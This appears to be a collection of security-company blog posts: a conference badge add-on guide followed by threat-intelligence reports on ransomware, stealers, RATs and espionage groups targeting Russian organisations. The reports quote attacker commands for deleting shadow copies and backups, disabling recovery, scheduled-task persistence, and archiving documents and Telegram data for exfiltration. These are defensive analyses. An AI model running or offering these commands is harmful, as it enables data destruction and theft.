The badges for OFFZONE 2022 will be just as memorable as previous years. We promise to deliver a sleek design with plenty of interactive features.
Let’s briefly recount the evolution of the OFFZONE badge. At the last conference, we made it in the form of an interactive printed circuit board (PCB) designed as a 3.5-inch floppy disk. The board could be accessorized: participants could attach a display, IR receiver, and other interesting things right at the soldering zone at the venue.
Starting from 2020, we’ve been postponing OFFZONE, so the 2020 badge design has never taken flight 😔
Internals of the OFFZONE 2022 badge
This year, we decided to split the traditional badge functionality: now the conference badge will operate as a wallet for your Offcoins, the currency used at the event, while the tasks will be moved to a separate device. But this doesn’t mean that the badge is now plain vanilla. Its main features in 2022 are customization and the creation of add-ons with unique designs. This could have become reality back in 2020, but, alas… no need to spell it out for you here, right?
Every add-on starts with a connector. This is a four-pin plug that makes the thing connectable to the badge’s main board. And because we’re using a connector, there will be no need for any soldering. The main board will have at least 2 slots for add-ons, which can be hand made by any participant. When creating them, you will have to adhere to some technical limitations, which we will tell you further down the line.
An add-on doesn’t have to necessarily have a full-fledged circuit of microcontrollers, transistors, and other crafty electrical modules. If you’re not really into the intricacies of circuitry, you can get by with a couple of LEDs and an unusual form of your textolite board. Even with this simplistic design approach, you can still have your jolt of fun!
How to create an add-on
Here’s your step-by-step guide to designing your own add-on.
0. Read the requirements:
Maximum dimensions: 5 cm x 5 cm
Connector location: at the bottom and approximately in the center of your add-on
Maximum power consumption of the add-on electrical circuit: 100 mA
Solder mask colors: green, red, yellow, blue, black, or white
Screen print colors: red, yellow, blue, black, or white
Power supply for your electrical circuit: 3.3 V
Connection interface: I2C
PCB topology: single or double-sided, one conducting layer per side
PCB input data format: Gerber
For convenience, our colleagues abroad have standardized the add-on pinout and size. All this was jokingly called a “shitty connector.” It hurts to look at these specs, but anyway it has all the data you need to design your own add-on.
1. Come up with an idea. Your idea can be anything: a meme character, your personal symbol, a company’s logo, or even a cat’s nose. At its simplest, you can get away with just a ready image, preferably in a vector SVG or DXF format, and import it into the PCB design software. You may be better off if you use black-and-white images for import. Also, we advise you the graphics editor Inkscape to prepare your images for import.
Here’re some add-ons from DEF CON to inspire you:
2. Think of extra features if you need them
3. Choose your development toolset. At this stage, decide which computer-aided design (CAD) system you’re going to use. There’re tons of PCB layout software out there for all tastes and colors. Here’re the most popular and accessible tools: KiCAD, EasyEDA, DipTrace, and CircuitStudio. KiCAD is open-source and free to use. The other three are commercial products whose trial versions offer enough functionality to create your own add-on.
It’s difficult to give advice on the choice of any particular CAD system. Each has its pros and cons, so just play around with the options.
4. Learn the basic CAD features. All CADs have a fair number of tutorials with examples of use. Also, they all have a similar development pipeline: once you get the hang of a CAD system, you won’t have much trouble learning another one.
We would recommend that you practice PCB design as follows:
Use basic components to build a simple electrical circuit made up of a couple of LEDs.
Fill out the rules to check the topology.
Experiment with different options for solder masks, metallization, and screen printing in your PCB editor.
Try to import images to the board.
Figure out the mechanism for creating polygons and layout verification.
Lay out your first PCB.
5. Design your add-on board. If you’re already experienced in PCB development or have confident CAD skills, you can move on to laying out your add-on.
6. Export your files into Gerber, the manufacturing format.
After you’ve laid out the add-on board, you will need to perform a simple yet important step — export the printed circuit board project into Gerber files. This should render a group of files that is a layer-by-layer description of your board.
7. Choose your production method:factory or toner transfer.
There’re quite a few Chinese factories out there: PCBWay, JLCPCB, ALLPCB, etc. As an upside, this gives cheap and quality results, as a downside, your PCB will take some time to arrive, as it will have quite the distance to travel. That’s why you might want to consider a local manufacturer.
The other, hardcore option is to create the add-on by yourself using the toner transfer or photoresist method. It’s hard, pricey and time-consuming, but captivating!
Here’re some boards made using toner transfer:
8. Order your PCB from a factory or make your own using toner transfer.
By now, you should have settled on the production method. Are you going with factory? Great, now you have to place your order. Typically, that includes filling out a form on the manufacturer’s website, uploading your Gerber files, and making the payment.
However, if you’ve chosen the path of a true samurai and decided to make the add-on board yourself, it’s time to stock up on the necessary materials and get to work. There’re tons of instructions and recommendations on the web for PCB etching, so you won’t get lost.
9. Stock up on cocoa and patience. At this point, there will be some PCB magic going on in the factory (if you chose contract manufacturing) or in your kitchen (if you opted for toner transfer).
10. Profit!
By this stage, you should have received your PCB from the manufacturer or completed your own. Well done! Examine the result carefully.
In case something didn’t work out or doesn’t match your original idea, panic not. Developing any PCB, or electronics in general, is a process of iterations, and an add-on is no exception. Fix the errors and repeat the order or manufacturing step. If you’ve reached this stage, you already know how to design a PCB.
And if you were able to achieve the desired result in the first attempt, congrats!
11. Come around to OFFZONE 2022 and show off your PCB.
Keep in mind that the third international conference on practical cybersecurity OFFZONE will be held on August 25–26. It will bring together security specialists, developers, engineers, researchers, lecturers, and students from dozens of countries. It focuses only on technical content dedicated to current industry trends. To learn how to participate, visit the event’s website.
A new threat has been uncovered. The Key Wolf hacker group is bombarding Russian users with file-encrypting ransomware. Interestingly enough, the attackers do not demand any ransom. Nor do they provide any options to decrypt the affected files. Our experts were the first to detect the proliferation of the new malware. In this publication, we will take a closer look at the attack and share our view on ways to mitigate it.
Key Wolf uses two malicious files with nearly identical names Информирование зарегистрированных.exe and Информирование зарегистрированных.hta (the words in Russian can be loosely translated as “Information for the registered”). The files are presumably delivered to the victims via email.
The first one is a self-extracting archive containing two files: gUBmQx.exe and LICENSE.
The second is an archive with a download script for gUBmQx.exe. The file is downloaded from Zippyshare with the help of Background Intelligent Transfer Service (BITS).
The file contains Key Group ransomware, which is based on another malicious program, Chaos. Information about the Chaos ransomware family first emerged on a popular underground forum in June 2021. The user ryukRans wrote that he was working on a ransomware builder and even shared a GitHub link to it (figure 1).
Figure 1. Underground forum post on Chaos Ransomware Builder*
*(translated from Russian) Wanna share the ransomware I’ve been working on lately. What do you think? What feature would you like this ransomware to have?
Download link: https://github.com/Hetropo/ryuk-ransomware try it out on a virtual machine
Several versions of the builder were released within a year. In June 2022, a so-called partner program was announced. It sought to attract pentesters and organize attacks on corporate networks (figure 2).
Figure 2. Underground forum post on Chaos Ransomware Builder
It is worth noting that Key Group ransomware was made with Chaos Ransomware Builder 4.0.
Ransomware mechanics
Once launched, Key Group performs the following:
Checks whether there is a process with the same name as that of the malicious file. If there is, it means that the ransomware is already running, so the newly launched process will stop.
If the checkSleep field is true, and, if the launch directory is not %APPDATA%, the .exe file waits for the number of seconds specified in the sleepTextbox field.
If checkAdminPrivilage is true, the malicious file copies itself into %APPDATA% and launches a new process as admin using runas. If the operation is declined by the user (UAC), the function restarts. If the names coincide and the program was launched from %APPDATA%, the function stops (thus, there is no infinite recursion during launch).
If checkAdminPrivilage is false, but checkCopyRoaming is true, the same process occurs as when checkAdminPrivilage is true, but without the escalation of privileges using runas.
If checkStartupFolder is true, then a web link to a malicious file is created in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup, which means that the file will be downloaded automatically.
If checkAdminPrivilage is true, then:
If checkdeleteShadowCopies is enabled, the function deletes shadow copies using vssadmin delete shadows /all /quiet & wmic shadowcopy delete.
If checkDisableRecoveryMode is enabled, the function turns off the recovery mode using bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no.
If checkdeleteBackupCatalog is enabled, the function deletes all backup copies using wbadmin delete catalog -quiet.
If checkSpread is true, the malware copies itself to all disks except C. Its file name is set up in the spreadName configuration (in this case, surprise.exe).
Creates a note in %APPDATA%\\\<droppedMessageTextbox\> and opens it. The note contains the following text: We are the keygroup777 ransomware we decided to help Ukraine destroy Russian computers, you can help us and transfer money to a bitcoin wallet <redacted>.
Installs the image shown below (figure 3) as the desktop theme.
Figure 3. Desktop theme
Encrypts each disk (except disk C) and the following folders recursively:
%USERPROFILE%\\Desktop
%USERPROFILE%\\Links
%USERPROFILE%\\Contacts
%USERPROFILE%\\Desktop
%USERPROFILE%\\Documents
%USERPROFILE%\\Downloads
%USERPROFILE%\\Pictures
%USERPROFILE%\\Music
%USERPROFILE%\\OneDrive
%USERPROFILE%\\Saved Games
%USERPROFILE%\\Favourites
%USERPROFILE%\\Searches
%USERPROFILE%\\Videos
%APPDATA%
%PUBLIC%\\Documents
%PUBLIC%\\Pictures
%PUBLIC%\\Music
%PUBLIC%\\Videos
%PUBLIC%\\Desktop
The malware will check each file in the directory whether it has one of the correct extensions and whether it is a note. The following process then depends on the file size:
If the file is under 2,117,152 bytes, it is encrypted with AES256-CBC. The key and IV are generated with the help of Rfc2898DeriveBytes with a password and salt [1, 2, 3, 4, 5, 6, 7, 8]. The password is 20 bytes in size. It has the character set abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/, and is generated with the help of the standard function Random(). After encryption, the password is written to the file under the XML tag <EncryptedKey>, which is encrypted by RSA1024-OAEP and encoded in Base64, then comes the encrypted file itself, encoded in Base64.
If the file is 2,117,152 bytes or more, but less than or equal to 200,000,000 bytes, the number of random bytes generated and added to the file equals one-fourth of the file’s original size. The bytes are added in the same format as in the case described above. The file contains a random encrypted password and is theoretically unrecoverable.
When the file size exceeds 200,000,000 bytes, a random number of bytes between 200,000,000 and 300,000,000 is added to the file in the same format as in the first case. The file contains a random encrypted password and is theoretically unrecoverable.
If the directory contains subdirectories, the malware will perform the same operation for each of them.
The program also has an additional functionality: it checks if there is a bitcoin address in the clipboard and substitutes it with one belonging to the attackers.
The indicators of compromise and detection rules are available to BI.ZONE ThreatVision clients.
Protecting against Key Wolf
The ransomware usually targets its victims through email attachments. One way to prevent a ransomware attack is to use a specialized solution that will stop a malicious message from being delivered to the inbox.
Among these solutions is BI.ZONE CESP. By inspecting every single incoming message, it helps companies avoid illegitimate messages without slowing down the exchange of secure emails. The service relies on over 600 filtering rules based on machine learning and methods of statistical, signature, and heuristic analysis.
Delivering attacks through emails is so last century, or at least so seem to think the Watch Wolf group hackers who switched to spreading their malware through SEO poisoning. We discovered that they deliver the Buhtrap trojan through fake websites posing as legitimate resources for accountants. Context ads help to get the websites to the top of search results.
Our Cyber Threat Intelligence team unearths a series of attacks by the Watch Wolf hacker group. The malicious campaign aims to steal money from Russian companies by compromising their accountant workstations and withdrawing funds through online banking.
Watch Wolf first came up on the radar in 2021 and has been known since for spreading malware through phishing emails.
In their latest active campaign, which was launched last November at the earliest, the attackers shifted to a new tactic by employing the so-called search engine optimization (SEO) poisoning. This tactic implies that threat actors add keywords to malicious websites to increase their rankings and display as one of the first search results. Moreover, the poisoning can be further augmented with paid context ads.
Watch Wolf created websites mimicking legitimate accounting resources and containing downloadable documents. The hackers leveraged SEO poisoning techniques and context ads to propel the websites to the top of search results (figure 1).
Figure 1. Search results
Advance report form, download for free (translated from Russian)
Unsuspecting users believe that the search results are most relevant to their needs and navigate to one of these websites. Once there, they are offered an option to download the needed document in a common file format, such as .xls for Microsoft Excel:
Figure 2. Malware-delivering website created by Watch Wolf
Proforma invoice
Proforma invoice is a preliminary bill that includes a description of the goods or services to be supplied and the bank details of the seller. The bill is issued as a standalone document or an appendix to an agreement signed by the parties.
Download Proforma invoice form (translated from Russian)
Clicking the link triggers the download process. However, instead of the file promised on the page, the victim receives an SFX archive with malware. The archive resides on a server of the Discord instant messaging platform.
Running the downloaded file results in the installation of the DarkWatchman backdoor. It is a JS-based remote access tool (RAT) stored in the folder C:\Users\%имя_пользователя%\AppData\Local\ and launched with the help of wscript.exe, for instance:
add_key is the key for decrypting the body of the JS script.
To achieve a persistent presence in the compromised system, the malware creates a scheduled task in the Windows Registry to launch DarkWatchman every time the user logs in. If the user has admin permissions, the malware deletes shadow copies on installation by running the following command:
vssadmin.exe Delete Shadows /All /Quiet
The backdoor uses the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM for storing the configuration data. This key also stores the body of the keylogger encoded to a base64 string. Once launched, the backdoor runs a PowerShell script that compiles and executes the keylogger:
Using the Windows Registry and Windows Management Instrumentation tools, the backdoor collects information about the operating system version, computer and user names, time zone and language, and antivirus programs installed. This data is sent to the command and control (C2) server.
The backdoor enables threat actors to launch executables, load DLL files, run scripts through various interpreters, upload files, and update both the RAT and the keylogger.
DarkWatchman generates a C2 server address from the fragments present in the code. Twenty already generated domains are aided by 100 more domains, which are generated based on the current date and time in the UTC format, for example: Tue, 04 Apr 2023 13:21:56 GMT. The timestamp is used to get a salt, which concatenates with the salt present in the code and the serial number of the domain name to be generated. For instance, Tue,04Apr20234d5e2eb0{i}, where i is the serial number between 0 and 100. For each of them, a CRC32 checksum is calculated and converted into a HEX string. This produces 120 domain names. The resulting string is then added to an upper-level domain.
Usually, there are three or four such domains. That means that within 24 hours the malware can generate between 360 and 480 domain names, which can potentially be the addresses of the DarkWatchman C2 servers. Once an array of potential C2 servers has been generated, the backdoor starts searching for an active one by sending the victim’s UID in the HTTP request header and expecting to receive the same UID in response.
While investigating a range of incidents related to Watch Wolf attacks, we discovered that DarkWatchman was used by the hacker group as a dropper (delivery program) to infect the already compromised computers with the Buhtrap trojan and install additional modules, such as Virtual Network Computing (VNC). The latter enabled the attackers to remotely control the infected computers.
It is noteworthy that Buhtrap, which appeared in 2014, has also been used for administering attacks against accountants in different industries.
The amount of damage from such attacks depends on the size of victim organizations as well as on transactional restrictions associated with specific banking accounts. In some instances, the attackers were able to siphon off tens of millions of rubles per targeted organization. The overall financial damage stemming from Buhtrap activities is estimated at 7 billion rubles.
When Buhtrap was delivered through phishing emails, raising employee awareness seemed like the right approach to mitigate the threat. Its effectiveness against SEO poisoning though appears to be limited, calling for a technological safeguard, such as BI.ZONE Secure DNS. Each time you access an external network, your request will go to the BI.ZONE server, where it will be analyzed using black and white lists to prevent you from interacting with malicious content. BI.ZONE TDR offers another way to handle hazardous communications by oursourcing this task to a security operations center (SOC).
The cyber spies who had been on hiatus since 2022 make a surprising comeback. Red Wolf has been spotted penetrating company infrastructures for espionage purposes. By slowly moving forward in the compromised environments and not drawing much attention, the group managed to stay invisible for up to six months.
BI.ZONE Cyber Threat Intelligence team has detected a new campaign by Red Wolf, a hacker group that specializes in corporate espionage. Similar to its previous campaigns, the group continues to leverage phishing emails to gain access to the target organizations. To deliver malware on a compromised system, Red Wolf uses IMG files containing LNK files. By opening such a file an unsuspecting victim runs an obfuscated DLL file, which in its turn downloads and executes RedCurl.FSABIN on the victim's device. This enables the attackers to run commands in the compromised environment and transfer additional tools for post-exploitation.
Key findings
Red Wolf continues to use traditional malware delivery methods, such as phishing emails that contain links to download malicious files
In the campaign detected by BI.ZONE, the attackers used IMG files with malicious shortcuts to download and run RedCurl.FSABIN
The group’s arsenal includes its own framework as well as a number of conventional tools, such as LaZagne and AD Explorer. To address its post-exploitation objectives, the group actively uses PowerShell
Red Wolf focuses on corporate espionage and prefers to slowly move forward in the compromised IT infrastructure. By not drawing much attention, it can remain invisible for up to six months
Campaign
BI.ZONE Cyber Threat Intelligence team has unearthed a new campaign by the Red Wolf group (aka RedCurl) that has been active at least since June 2018 in Russia, Canada, Germany, Norway, Ukraine, and the United Kingdom.
The detected file (fig. 1) is an optical disk image. Once opened, it mounts onto the compromised system.
Fig. 1. Visible content of the disk image
The disk image contains an LNK file and a hidden folder #TEMP (fig. 2). The folder contains several DLL files, and only one of them has malicious content.
Fig. 2. Files in #TEMP
Opening the LNK file triggers the execution of rundll32 with the following parameters:
rundll32.exe #temp\mKdPDaed.dll,ozCutPromo
The DLL file opens a web page (fig. 3).
Fig. 3. Web page opened by the DLL file
After that, RedCurl.FSABIN gets downloaded from https://app-ins-001.amscloudhost[.]com:443/dn01 and stored at C:\Users\[user]\AppData\Local\VirtualStore\ under the name chrminst_[computer name in base64].exe. The strings in the file are encrypted with AES-128 CBC. The first part of the password for the key can be found directly in the malware sample, while the second one can be retrieved from the command line, for instance:
To achieve persistence in the compromised system, a task named ChromeDefaultBrowser_Agent_[computer name in base64] is created in the Windows Task Scheduler.
The backdoor uses Windows API to gather information on the number of processors, memory size, storage capacity, as well as information on the amount of time that passed since the launch of the operating system before the malware sample being launched. This checkup is needed to identify a virtual environment and bypass respective security and analysis tools. Once the checkup is completed, the backdoor sends information about the compromised system to the command-and-control server. This information includes the username, the computer name, the domain name, a list of files and folders in Program Files, Desktop, and AppData\Local, and the unique identifier. After that, the backdoor downloads the DLL and executes its exported function (in this case, yDNvu).
Conclusions
Despite the widely known attack techniques, Red Wolf still manages to bypass traditional defenses and minimize the likelihood of detection. By not drawing much attention, the group is able to remain unnoticed in the compromised infrastructure for a long time and achieve its goals.
How to detect the traces of Red Wolf
Monitor the creation and mounting of small disk image files
Pay attention to the DLL files run by rundll32 from #TEMP
Track suspicious files run by the Windows Task Scheduler from C:\Users\[user]\AppData\Local
Look for traces of network communications with subdomains *.amscloudhost[.]com
Prioritize the detection of tactics, techniques, and procedures specific to Red Wolf
Detailed information about Red Wolf, its tactics, techniques, and procedures, as well as more indicators of compromise are available with BI.ZONE ThreatVision.
Cybercriminals have modified the standard “phishing email + remote access” combo with an unexpected hook — the leveraging of legitimate Russian software. BI.ZONE CESP has detected and prevented one such attack that targeted hospitality organizations. We are taking an in-depth look at the attack to explain why the potential victims weren’t able to detect it on their own.
Key findings
Phishing emails remain a weapon of choice for getting initial access in targeted attacks
File extensions are hidden, given the default settings in the Windows OS, which is why attackers can camouflage executables as regular files
The threat actors use rare yet legitimate remote access software to bypass traditional defenses
Campaign
The perpetrators were sending out phishing emails under the disguise of OOO Federal Hotel Service. The emails contained a link to an archive with a malicious file (Fig. 1).
Fig. 1. Phishing email sent to potential victims
The archived file was the Inno Setup installer with the following files:
Assistant software components
quartz.dll
roh2w3.bmp
whu3.cfg
zs3eu.bat
The zs3eu.bat script
creates the folder C:\Users\\[user\]\AppData\Roaming\tip
pastes into it all the files from the temporary folder by means of xcopy
uses del /f /q to delete the running script
launches the Assistant app (ast.exe)
uses rd /s /q to purge the temporary folder
The Assistant application loads the malicious file quartz.dll, which contains the next stage. The latter is encrypted in RC4, where the key is an MD5 checksum calculated from the CRC32 checksum from the C2 server address. This address is stored in the file whu3.cfg, also encrypted in RC4. The key is an MD5 checksum calculated from the CRC32 checksum from the file roh2w3.bmp.
The second stage replaces the import of GetCommandLine with its own initialization function to perform the following actions:
record the MD5 checksum from the password known to the cybercriminals to HKEY_CURRENT_USER\Software\safib\ast\SS — Security.FixPass
assign the Hidden and System attributes to all files in the current directory
enable Assistant to start automatically by creating the parameter tip in Software\Microsoft\Windows\CurrentVersion\RunOnce
create a unique user identifier by calculating an MD5 checksum from the total of the CRC32 checksums from the OS version, the user name, and the computer name
obtain an Assistant user identifier from HKEY_CURRENT_USER\Software\safib\ast\SS—your_id
repeatedly send GET requests containing an Assistant user identifier and the unique user identifier to the C2 server
submit the ast.exe parameters -AHIDE и -ASTART for a hidden launch
Fig. 2. Assistant software screenshot
The Assistant software enables attackers to hijack control over the compromised system, block input devices, copy files, modify the registry, use the Windows command line, etc.
Conclusions
Quartz Wolf continues the trend of using legitimate software as a tool for remote access to compromised systems. As this approach consistently demonstrates its effectiveness, organizations should be very careful when working with remote access solutions and watch closely over their processes.
How to trace the presence of Quartz Wolf
Pay attention to the Assistant software files stored outside of what should be their standard directories
Trace network communications with id.ассистент\[.\]рф at the hosts where Assistant should not be installed
Monitor the mass copying of files into the subfolders C:\Users\\[user\]\AppData\Roaming via xcopy
Any threat actor with $140 can utilize this malware. For that price, they get a complete end-to-end attack kit: i) a builder to create malware samples, ii) access to the control panel of compromised devices, iii) updates and messenger support. Keep reading for more information about the popular stealer targeting people at Russian companies.
Stealers are a significant occurrence in today’s threatscape and one of the most popular ways to obtain legitimate login credentials as initial access to corporate networks. In February 2023, the White Snake stealer first appeared on the darknet. It is actively advertised as an easy solution for launching targeted attacks and obtaining stored passwords as well as file copies, keystrokes, and remote access to the compromised device.
Specialists from BI.ZONE Cyber Threat Intelligence discovered a White Snake distribution campaign targeting Russian organizations. The stealer is distributed via phishing emails under the guise of some requirements from Roskomnadzor (Russia’s Federal Service for Supervision of Communications, Information Technology and Mass Media).
Key findings
A successful stealer attack can allow threat actors to gain access to multiple corporate resources, such as email and CRM.
The ability to rent or purchase this type of malware can significantly reduce the skill level required to execute targeted attacks.
The damage from a successful attack may not be necessarily: attackers often resell the data collected by the stealers.
Campaign
The victim would receive a phishing email with an archive that contained several files:
The first file (fig. 1) is a phishing document that aims to lure the victim into opening the second file, which is the White Snake stealer.
Fig. 1. Text from the phishing document
The message from Roskomnadzor urges the reader to promptly open the attached materials and provide reasoned explanations for the alleged visits to prohibited Internet resources.
The White Snake stealer appeared on popular dark forums in February 2023 and was positioned as a tool for implementing targeted attacks (fig. 2).
Fig. 2. A White Snake thread on a popular underground forum
In addition to the underground forums, the stealer also has its own Telegram channel (fig. 3), which can be used to follow all its updates.
Fig. 3. Message from the White Snake channel in Telegram
A monthly fee for the stealer is just $140, unlimited access can be purchased for $1,950. Payments are made in one of the cryptocurrencies (fig. 4).
Fig. 4. White Snake stealer price list
After payment, the customer receives a builder for creating malware samples and access to the compromised devices control panel.
The builder (fig. 5) allows criminals to configure the stealer features (e.g., add a Telegram token to save the extracted data, select the data encryption method, define the set of extracted data, edit the icon of the executable file, etc.).
Fig. 5. White Snake builder
The control panel (fig. 6) enables the threat actors to monitor compromised devices, interact with them, and execute commands. In addition, the control panel allows access to all the data collected by the stealer.
Fig. 6. White Snake control panel
After launching from the archive, the executable performs the following actions:
creates a mutex (according to the configuration)
if the feature is enabled, verifies that the startup is not in a virtual space
if enabled, copies all files to the directory C:\Users\[user]\AppData\Roaming\[config_folder_name], and executes the command below depending on the user's permissions. If the user is an administrator, the command will be executed with HIGHEST privileges. Otherwise it will be executed with LIMITED privileges.
/C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "[task name]" /sc MINUTE /tr "[file path in the created folder]" /rl [launch permissions] /f && DEL /F /S /Q /A "[previous file path]" && START "" "[file path in the created folder]"
initializes a Tor network node on a random port between 2000 and 7000
initializes the module to retrieve user data and send it to the server
if the feature is enabled, creates its copies on external media and in the autoloader (C:\Users\[user]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) for other system users
if the feature is enabled, initializes the keylogger module
When sending data to the C2 server, the executable collects the following information about the system:
The configurations for retrieving user data are contained in an XML file and feature the following data types:
relative paths to Chromium-like browsers
relative paths to Firefox-like browsers
file masks to be collected
registry sections to extract data from
Since the stealer can persist on a compromised system, attackers can gain access to it, record screen video, execute commands, and download additional malware.
Conclusions
The dark segment of the Internet offers more and more high-quality tools for targeted attacks that not only bypass legacy defenses, but also provide attackers with all the means to achieve their goals. As such malware is easy to buy and operate, the number of targeted attacks increases inevitably. In order to effectively protect against such threats, it is not enough to deploy cybersecurity solutions. It is also necessary to respond to incidents on time and investigate them.
How to detect traces of White Snake
Monitor network communications with ip-api.com from non-typical processes.
Pay attention to the newly created suspicious tasks in the scheduler and executables added to the startup.
Monitor executable files created in subfolders C:\Users\[user]\AppData\Roaming.
Phishing emails are one of the main ways to gain initial access in a targeted attack. To protect against this, we recommend using specialized solutions that block spam and malicious emails. One such solution is BI.ZONE CESP. If you detect signs of compromise, contact our experts immediately to investigate and shut down access to your IT infrastructure before the attackers cause damage.
Our cyber threat intelligence experts discover a new group that uses presumably legitimate software to interfere with government organizations. A characteristic feature of these attackers is the use of popular tools that are easy to detect and block. Nevertheless, this has not stopped Sticky Werewolf from succeeding. The group’s activity can be traced back to April 2023 with at least 30 attacks to date.
Key findings
Public organizations in Russia and Belarus remain a popular target for espionage.
The adversaries have been able to effectively exploit even the widespread RAT-type* malware to gain initial access.
To increase the effectiveness of the notorious program, the adversaries use protectors such as Themida, which makes it difficult to analyze the malware.
* Remote administration tool (RAT) is a software that enables complete remote control of a computer device
Campaign
To gain initial access to its target systems, Sticky Werewolf used phishing emails with links to malicious downloadables. The links were generated with the help of IP Logger. The tool enabled the adversaries both to create phishing links and to collect information about the victims who clicked them. Thus, they obtained such information as the timestamp, IP address, country, city, browser and operating system versions. This information allowed the adversaries to immediately conduct basic profiling of potentially compromised systems and select the most significant ones, disregarding those related to, for example, sandboxes, research activities, and countries outside the group’s focus.
In addition, IP Logger enabled the criminal group to use their own domain names. This way, the phishing link was made to look as authentic as possible to the victim, for example: hXXps://diskonline[.]net/poryadok-deystviy-i-opoveshcheniya-grazhdanskoy-oborony.pdf.
The phishing links contained malicious files with .exe or .scr extensions that were masked as Microsoft Word or PDF documents. Clicking such a file opened the legitimate document with the proper format and installed the NetWire RAT. For instance, an emergency warning from the EMERCOM of Russia was used as a document aimed at distracting the victim (fig. 1).
Fig. 1. An example of a document used by the adversaries
Another example is a court claim application (fig. 2).
Fig. 2. An example of a document used by the adversaries
As for the attacks on Belarusian organizations, among the documents used was a prescription to eliminate some legal code violations (fig. 3).
Fig. 3. An example of a document used by the adversaries
Together with the document, NetWire was copied into the folder C:\Users\User\AppData\Local\Temp under the name of a legitimate application such as utorrent.exe (µTorrent). To gain persistence in the compromised system, a shortcut was created in the autostart folder that indicates a malware sample, for example: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uTorrent.lnk. Sticky Werewolf used the Themida protector to obfuscate NetWire, making it difficult to detect and analyze.
NetWire allowed the criminals to gather information about the compromised system and perform the following actions:
manage files, processes, services, windows, as well as installed applications and network connections
edit the Windows Registry
modify and retrieve data from the clipboard
obtain keystroke data
capture screen and webcam video, and record microphone audio in real time
execute commands remotely using the Windows command line
obtain authentication data from various sources
load and run files
read and edit the file C:\Windows\System32\drivers\etc\hosts
retrieve lists of network folders and devices on the local network
perform network scanning
Notably, in March 2023, an individual who had been selling NetWire as legitimate software for several years, was apprehended in Croatia. Meanwhile, the domain name used to distribute the software, as well as the server, was seized.
Conclusions
Commercial malware is in high demand among cybercriminals and state-sponsored groups alike as it provides extensive functionality for just a few dozen dollars. Moreover, such malware does not cease with the arrest of its developer. Programs like this continue to find demand among other threat actors.
Where to look for traces of Sticky Werewolf
Beware of suspicious executables running from temporary folders.
Track the appearance of executables masked as legitimate applications in unusual file locations.
Monitor the access by suspicious processes to files with authentication data, related to browsers, email, etc.
More indicators of compromise are available on the BI.ZONE ThreatVision platform.
How to safeguard your company against such threats
Phishing emails are a popular attack vector against organizations. To protect your mail, you can use dedicated filtering solutions to help you keep unwanted email out of your inbox. One such solution is BI.ZONE CESP. It safeguards companies from illegitimate emails by screening each inbound message. More than 600 filtering mechanisms are implemented on the basis of machine learning, statistical, signature, and heuristic analysis. This message validation does not delay the delivery of secure emails.
To better understand the current cyber threat landscape and realize exactly how infrastructures similar to yours are being attacked, we recommend leveraging the data from the BI.ZONE ThreatVision platform. The solution helps you proactively protect your business with comprehensive threat intelligence and daily updated indicators of compromise to improve the effectiveness of your information defenses.
Phishing emails are a popular attack vector against organizations. To protect your mail, you can use dedicated filtering solutions to help you keep unwanted email out of your inbox. One such solution is BI.ZONE CESP. It safeguards companies from illegitimate emails by screening each inbound message. More than 600 filtering mechanisms are implemented on the basis of machine learning, statistical, signature, and heuristic analysis. This message validation does not delay the delivery of secure emails.
To better understand the current cyber threat landscape and realize exactly how infrastructures similar to yours are being attacked, we recommend leveraging the data from the BI.ZONE ThreatVision platform. The solution helps you proactively protect your business with comprehensive threat intelligence and daily updated indicators of compromise to improve the effectiveness of your information defenses.
How adversaries create diversions and stay invisible
BI.ZONE Threat Intelligence specialists have discovered a cybercriminal group that has been active since at least 2019. While this cluster of activity was previously directed against the countries neighboring Russia, now such attacks have reached Russia itself. The attackers use phishing emails to install a legitimate monitoring tool, Mipko Employee Monitor, on target devices and gain access to the Telegram messenger, steal sensitive documents and passwords.
Key findings
Unusual attachment formats tend to lower the victim’s guard and increase the likelihood of a compromise.
Hacking and stealing Telegram accounts is particularly popular, besides accessing user data is as easy as copying a single folder.
Attackers make extensive use of legitimate monitoring tools. This allows them to go undercover inside the compromised IT infrastructure.
Campaign
The criminals sent phishing emails with archives that contained, as they claimed, 1C:Enterprise invoices and their digital keys. This enabled them to distract the victims from noticing the file extension. The content of the message is shown in the figure below.
The phishing email text
The archive contained an executable 1C.Предприятие Платежная накладная №579823592352-2023.scr, which was the installer for Smart Install Maker.
Running the executable file caused the following actions:
Creation of a folder C:\Intel\ and assigning the attributes Hidden, System, Unindexed.
Creation of keys Video Configurations and Mail Configurations in the registry hive Software\Microsoft\Windows\CurrentVersion\Run. The key values were set as file paths C:\Intel\go.exe and C:\Intel\mail.exe that would be unpacked later.
Creation of a file C:\Intel\rezet.cmd, downloading encrypted archives from the C2 server using cURL and driver.exe to unpack them:
In addition, driver.exe served to collect and archive all Microsoft Word documents:
C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\doc.rar C:\*.doc* /y
Telegram messenger data was also collected and packaged:
C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "C:\Users\[user]\AppData\Roaming\Telegram Desktop\tdata" /y
The attackers sent the collected data through a controlled mail service. For this purpose, they extracted the Blat utility from the pas.rar archive and used it to send emails through the command line:
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar blat.exe C:\Intel\ /y
Then both archives were sent to the attackers’ email account:
After sending, the archives with the collected data and the cURL utility were deleted:
del /q C:\Intel\curl.exe del /q /f C:\Intel\doc.rar del /q /f C:\Intel\tdata.rar
Next, the go.exe file was extracted from the keys.rar archive. Execution was suspended for an hour using the ping utility after which the files mail.exe and userprofile.exe were extracted from the archives. The latter was launched to install Mipko Employee Monitor software in the compromised system:
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar go.exe C:\Intel\ /y ping -n 3600 127.0.0.1 C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar mail.exe C:\Intel\ /y C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar userprofile.exe C:\Intel\ /y C:\Intel\userprofile.exe
At this point, the system was forced to reboot and the rezet.cmd file was deleted:
wmic OS WHERE Primary="TRUE" CALL Win32Shutdown 6 del /q C:\Intel\rezet.cmd
